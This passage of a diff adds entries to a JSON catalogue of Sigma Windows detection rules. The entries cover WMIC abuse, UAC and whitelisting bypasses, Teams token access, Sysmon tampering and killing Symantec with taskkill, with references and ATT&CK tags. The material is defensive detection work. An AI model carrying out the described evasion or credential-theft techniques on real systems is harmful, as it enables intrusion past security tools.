execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "meta": { + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via Winrm.vbs", + "meta": { + "refs": [ + "https://twitter.com/bohops/status/994405551751815170", + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_winrm_execution.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use for administartive purposes. Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_susp_winzip.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation", + "meta": { + "refs": [ + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2021/06/25", + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate software creating script event consumers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution", + "meta": { + "refs": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_wmic_execution.yml", + "author": "Michael Haag, Florian Roth, juju4, oscd.community", + "level": "medium", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate", + "meta": { + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product", + "meta": { + "refs": [ + "https://twitter.com/cglyer/status/1355171195654709249", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/01/30", + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", + "value": "Execution via WorkFolders.exe", + "meta": { + "refs": [ + "https://twitter.com/elliotkillick/status/1449812843772227588", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/21", + "filename": "proc_creation_win_susp_workfolders.yml", + "author": "Maxime Thiebaut (@0xThiebaut)", + "level": "high", + "falsepositive": [ + "Legitimate usage of the uncommon Windows Work Folders feature." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_susp_wuauclt.yml", + "author": "FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/26", + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1451237393017839616", + "https://github.com/Tylous/ZipExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/11/07", + "filename": "proc_creation_win_susp_zipexec.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "proc_creation_win_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2021/02/02", + "filename": "proc_creation_win_sus_auditpol_usage.yml", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "level": "high", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2017/08/28", + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", + "author": "Markus Neis", + "level": "low", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2022/06/16", + "filename": "proc_creation_win_sysinternals_psservice.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of PsService by an administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load", + "meta": { + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect possible Sysmon driver unload", + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload", + "meta": { + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "author": "Kirill Kiryanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags", + "creation_date": "2022/11/10", + "filename": "proc_creation_win_sysmon_exploitation.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", + "value": "UAC Bypass via Event Viewer", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/19", + "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_sysnative.yml", + "author": "Max Altgelt", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly", + "meta": { + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2017/11/27", + "filename": "proc_creation_win_system_exe_anomaly.yml", + "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Exotic software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_tap_installer_execution.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", + "value": "Taskkill Symantec Endpoint Protection", + "meta": { + "refs": [ + "https://www.exploit-db.com/exploits/37525", + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_taskkill_sep.yml", + "author": "Ilya Krestinichev, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion", + "meta": { + "refs": [ + "https://twitter.com/subTee/status/1216465628946563073", + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" + ], + "creation_date": "2020/01/13", + "filename": "proc_creation_win_task_folder_evasion.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/09/16", + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", + "value": "Terminal Service Process Spawn", + "meta": { + "refs": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/05/22", + "filename": "proc_creation_win_termserv_proc_spawn.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", + "value": "SMB Relay Attack Tools", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1557/001/", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ], + "creation_date": "2021/07/24", + "filename": "proc_creation_win_tools_relay_attacks.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Legitimate files with these rare hacktool names" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/31", + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "value": "NirCmd Tool Execution", + "meta": { + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_nircmd.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM", + "meta": { + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NSudo tool for command execution", + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution", + "meta": { + "refs": [ + "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_nsudo_execution.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service execution via default service image name", + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "proc_creation_win_tool_psexec.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System", + "meta": { + "refs": [ + "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_runx_as_system.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use", + "meta": { + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ], + "creation_date": "2022/02/20", + "filename": "proc_creation_win_tor_browser.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of TruffleSnout.exe", + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_trufflesnout.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_trust_discovery.yml", + "author": "E.M. 